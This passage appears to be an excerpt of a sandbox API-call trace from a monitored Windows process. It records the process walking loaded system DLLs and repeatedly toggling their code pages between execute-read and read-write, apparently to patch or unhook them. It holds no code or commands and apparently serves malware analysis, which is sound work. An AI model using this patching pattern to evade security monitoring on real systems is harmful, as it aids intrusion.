"c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0068.631] GetCurrentProcess () returned 0xffffffff [0068.631] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76f910b8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76f91000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.631] GetCurrentProcess () returned 0xffffffff [0068.632] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76f910b8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76f91000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.632] GetCurrentProcess () returned 0xffffffff [0068.632] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76f910f4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76f91000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.632] GetCurrentProcess () returned 0xffffffff [0068.632] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76f910f4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76f91000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.632] GetCurrentProcess () returned 0xffffffff [0068.632] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76f91100, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76f91000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.632] GetCurrentProcess () returned 0xffffffff [0068.632] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76f91100, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76f91000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.632] GetCurrentProcess () returned 0xffffffff [0068.633] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76f9111c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76f91000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.633] GetCurrentProcess () returned 0xffffffff [0068.633] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76f9111c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76f91000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.633] GetCurrentProcess () returned 0xffffffff [0068.633] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76f91128, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76f91000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.633] GetCurrentProcess () returned 0xffffffff [0068.633] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76f91128, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76f91000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.634] GetCurrentProcess () returned 0xffffffff [0068.634] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76f9122c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76f91000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.634] GetCurrentProcess () returned 0xffffffff [0068.634] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76f9122c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76f91000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.634] GetCurrentProcess () returned 0xffffffff [0068.634] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76f91244, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76f91000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.634] GetCurrentProcess () returned 0xffffffff [0068.634] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76f91244, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76f91000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.635] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.635] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0068.635] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0068.636] GetModuleFileNameA (in: hModule=0x77710000, lpFilename=0x6ef4a4, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0068.636] GetCurrentProcess () returned 0xffffffff [0068.636] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77711520, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.636] GetCurrentProcess () returned 0xffffffff [0068.636] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77711520, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.636] GetCurrentProcess () returned 0xffffffff [0068.636] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77711540, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.637] GetCurrentProcess () returned 0xffffffff [0068.637] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77711540, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.637] GetCurrentProcess () returned 0xffffffff [0068.637] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7771175c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.637] GetCurrentProcess () returned 0xffffffff [0068.637] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7771175c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.637] GetCurrentProcess () returned 0xffffffff [0068.637] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77711768, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.637] GetCurrentProcess () returned 0xffffffff [0068.637] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77711768, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.638] GetCurrentProcess () returned 0xffffffff [0068.638] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7771176c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.638] GetCurrentProcess () returned 0xffffffff [0068.638] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7771176c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.638] GetCurrentProcess () returned 0xffffffff [0068.638] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x777117b8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.638] GetCurrentProcess () returned 0xffffffff [0068.638] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x777117b8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.638] GetCurrentProcess () returned 0xffffffff [0068.638] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x777117bc, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.639] GetCurrentProcess () returned 0xffffffff [0068.639] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x777117bc, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.639] GetCurrentProcess () returned 0xffffffff [0068.639] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x777117c0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.639] GetCurrentProcess () returned 0xffffffff [0068.639] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x777117c0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.639] GetCurrentProcess () returned 0xffffffff [0068.639] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x777117c8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.639] GetCurrentProcess () returned 0xffffffff [0068.640] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x777117c8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.640] GetCurrentProcess () returned 0xffffffff [0068.640] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x777117d0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.640] GetCurrentProcess () returned 0xffffffff [0068.640] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x777117d0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.640] GetCurrentProcess () returned 0xffffffff [0068.640] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x777117f0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.640] GetCurrentProcess () returned 0xffffffff [0068.640] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x777117f0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.640] GetCurrentProcess () returned 0xffffffff [0068.641] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7771180c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.641] GetCurrentProcess () returned 0xffffffff [0068.641] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7771180c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.641] GetCurrentProcess () returned 0xffffffff [0068.641] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7771182c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.641] GetCurrentProcess () returned 0xffffffff [0068.641] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7771182c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.644] GetCurrentProcess () returned 0xffffffff [0068.645] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77711850, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.645] GetCurrentProcess () returned 0xffffffff [0068.645] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77711850, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.645] GetCurrentProcess () returned 0xffffffff [0068.645] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77711860, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.645] GetCurrentProcess () returned 0xffffffff [0068.645] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77711860, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.645] GetCurrentProcess () returned 0xffffffff [0068.645] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77711864, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.646] GetCurrentProcess () returned 0xffffffff [0068.646] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77711864, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.646] GetCurrentProcess () returned 0xffffffff [0068.646] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77711868, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.646] GetCurrentProcess () returned 0xffffffff [0068.646] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77711868, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.646] GetCurrentProcess () returned 0xffffffff [0068.646] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7771186c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.646] GetCurrentProcess () returned 0xffffffff [0068.646] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7771186c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.647] GetCurrentProcess () returned 0xffffffff [0068.647] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77711870, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.647] GetCurrentProcess () returned 0xffffffff [0068.647] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77711870, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77711000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.647] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.648] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0068.648] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0068.648] GetModuleFileNameA (in: hModule=0x76d10000, lpFilename=0x6ef4a4, nSize=0x105 | out: lpFilename="C:\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0068.648] GetCurrentProcess () returned 0xffffffff [0068.648] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76d1101c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76d11000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.648] GetCurrentProcess () returned 0xffffffff [0068.649] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76d1101c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76d11000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.649] GetCurrentProcess () returned 0xffffffff [0068.649] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76d11074, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76d11000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.649] GetCurrentProcess () returned 0xffffffff [0068.649] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76d11074, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76d11000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.649] GetCurrentProcess () returned 0xffffffff [0068.649] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76d11088, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76d11000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.649] GetCurrentProcess () returned 0xffffffff [0068.649] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76d11088, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76d11000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.650] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.651] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0068.651] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0068.651] GetModuleFileNameA (in: hModule=0x76af0000, lpFilename=0x6ef4a4, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0068.651] GetCurrentProcess () returned 0xffffffff [0068.651] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76b00208, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76b00000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.651] GetCurrentProcess () returned 0xffffffff [0068.651] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76b00208, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76b00000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.651] GetCurrentProcess () returned 0xffffffff [0068.651] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76b00218, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76b00000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.652] GetCurrentProcess () returned 0xffffffff [0068.652] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76b00218, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76b00000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.652] GetCurrentProcess () returned 0xffffffff [0068.652] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76b00328, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76b00000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.652] GetCurrentProcess () returned 0xffffffff [0068.652] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76b00328, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76b00000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.652] GetCurrentProcess () returned 0xffffffff [0068.652] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76b00330, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76b00000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.653] GetCurrentProcess () returned 0xffffffff [0068.653] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76b00330, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76b00000, 